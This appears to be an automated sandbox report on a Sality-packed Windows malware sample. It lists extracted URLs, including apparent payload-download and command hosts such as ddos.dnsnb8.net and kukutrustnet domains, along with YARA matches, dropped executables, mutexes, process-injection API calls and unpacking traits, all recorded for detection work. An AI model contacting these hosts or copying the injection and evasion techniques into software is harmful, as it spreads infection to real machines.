          Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar6
          Source: rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar9
          Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarL
          Source: rksowY.exe, 00000002.00000002.2255119471.00000000028CA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
          Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?6bfcc6=28308248
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?6bfcc6=28308248jh7
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060&o
          Source: 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060-
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060704hM
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=1603540608oI
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060Nh
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060xoP
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777.info/home.gif
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet888.info/home.gif
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet987.info/home.gif
          Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://pan.baidu.com/s/1qWKD5ve
          Source: Amcache.hve.2.drString found in binary or memory: http://upx.sf.net
          Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.com
          Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.comHolger
          Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.com
          Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.comBrendon
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000111D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?5059c3=10531718
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000111D000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?ad5654=34079484
          Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.com
          Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.comDeepak
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers
          Source: SciTE.exe.2.drString found in binary or memory: http://www.lua.org
          Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.com
          Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.comJosiah
          Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org
          Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org/scite.rng
          Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.com
          Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.comMathias
          Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.youku.com/playlist_show/id_25824322.html
          Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comrobat
          Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/
          Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/Morten
          Source: SciTE.exe.2.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_bae7b752-b
          Source: Yara matchFile source: 0.2.1.0.0.2.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.1.0.0.2.exe.111ff18.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
          Source: 0.2.1.0.0.2.exe.2be2300.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
          Source: 0.2.1.0.0.2.exe.2be25f4.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
          Source: 0.2.1.0.0.2.exe.2b60000.10.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
          Source: 0.2.1.0.0.2.exe.10eb0bc.8.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
          Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe, type: DROPPEDMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
          Source: C:\iuepn.exe, type: DROPPEDMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
          PE file contains section with special chars
          Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
          PE file has a writeable .text section
          Source: iuepn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: rksowY.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: winmefmb.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B696520_2_02B69652
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B722A00_2_02B722A0
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B66A850_2_02B66A85
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B60762_2_005B6076
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B6D002_2_005B6D00
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\rksowY.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1328
          Source: MyProg.exe.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
          Source: 1.0.0.2.exeBinary or memory string: \StringFileInfo\%s\OriginalFilename vs 1.0.0.2.exe
          Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: \StringFileInfo\%s\OriginalFilename vs 1.0.0.2.exe
          Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: N/A%02X-%02X-%02X-%02X-%02X-%02Xwww.dywt.com.cnGlobalMemoryStatusExKernel32.dllx86 Family %s Model %s Stepping %s%08X-%08X-%08X-%08X\StringFileInfo\%s\Comments\StringFileInfo\%s\ProductVersion\StringFileInfo\%s\ProductName\StringFileInfo\%s\OriginalFilename\StringFileInfo\%s\LegalTrademarks\StringFileInfo\%s\LegalCopyright\StringFileInfo\%s\InternalName\StringFileInfo\%s\FileDescription\StringFileInfo\%s\CompanyName%s\StringFileInfo\%s\FileVersion040904E4000%x, \VarFileInfo\TranslationopenMicrosoft Internet Explorer vs 1.0.0.2.exe
          Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D37000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename_R2Launcher.exe@ vs 1.0.0.2.exe
          Source: 1.0.0.2.exeBinary or memory string: OriginalFilename_R2Launcher.exe@ vs 1.0.0.2.exe
          Source: 1.0.0.2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 0.2.1.0.0.2.exe.111ff18.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
          Source: 0.2.1.0.0.2.exe.2be2300.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
          Source: 0.2.1.0.0.2.exe.2be25f4.12.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
          Source: 0.2.1.0.0.2.exe.2b60000.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
          Source: 0.2.1.0.0.2.exe.10eb0bc.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
          Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
          Source: C:\iuepn.exe, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
          Source: rksowY.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: iuepn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: rksowY.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: winmefmb.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: iuepn.exe.0.drStatic PE information: Section .text
          Source: winmefmb.exe.0.drStatic PE information: Section .text
          Source: rksowY.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
          Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@5/15@10/5
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B6CC92 LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,FindCloseChangeNotification,GetTokenInformation,GetTokenInformation,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification,0_2_02B6CC92
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,2_2_005B119F
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B6D2B0 CreateToolhelp32Snapshot,Process32First,Process32Next,CreateMutexA,FindCloseChangeNotification,0_2_02B6D2B0
          Source: C:\Users\user\Desktop\1.0.0.2.exeFile created: C:\Users\user\Desktop\VF.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_496_
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\registryM_92_
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\smss.exeM_328_
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_412_
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_488_
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_928_
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_780_
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_560_
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_788_
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_996_
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_652_
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\services.exeM_632_
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_868_
          Source: C:\Users\user\Desktop\1.0.0.2.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_752_
          Source: C:\Users\user\Desktop\1.0.0.2.exeFile created: C:\Users\user\AppData\Local\Temp\rksowY.exeJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeFile read: C:\Windows\system.iniJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 1.0.0.2.exeVirustotal: Detection: 86%
          Source: unknownProcess created: C:\Users\user\Desktop\1.0.0.2.exe "C:\Users\user\Desktop\1.0.0.2.exe"
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\rksowY.exe C:\Users\user\AppData\Local\Temp\rksowY.exe
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1328
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\rksowY.exe C:\Users\user\AppData\Local\Temp\rksowY.exeJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: clinkapi.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: ntvdm64.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeFile written: C:\Windows\system.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: 1.0.0.2.exeStatic file information: File size 5242880 > 1048576
          Source: 1.0.0.2.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x4cfc00
          Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeUnpacked PE file: 2.2.rksowY.exe.5b0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02BEBCD0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_02BEBCD0
          Source: initial sampleStatic PE information: section where entry point is pointing to: pu
          Source: 1.0.0.2.exeStatic PE information: section name: pu
          Source: VF.dll.0.drStatic PE information: section name: UPX2
          Source: rksowY.exe.0.drStatic PE information: section name: .aspack
          Source: rksowY.exe.0.drStatic PE information: section name: .adata
          Source: MyProg.exe.2.drStatic PE information: section name: PELIB
          Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
          Source: SciTE.exe.2.drStatic PE information: section name: u
          Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B73600 push eax; ret 0_2_02B7362E
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B6072E push eax; iretd 0_2_02B6072F
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B1638 push dword ptr [005B3084h]; ret 2_2_005B170E
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B2D9B push ecx; ret 2_2_005B2DAB
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B6014 push 005B14E1h; ret 2_2_005B6425
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B600A push ebp; ret 2_2_005B600D
          Source: 1.0.0.2.exeStatic PE information: section name: .rsrc entropy: 7.617344200663995
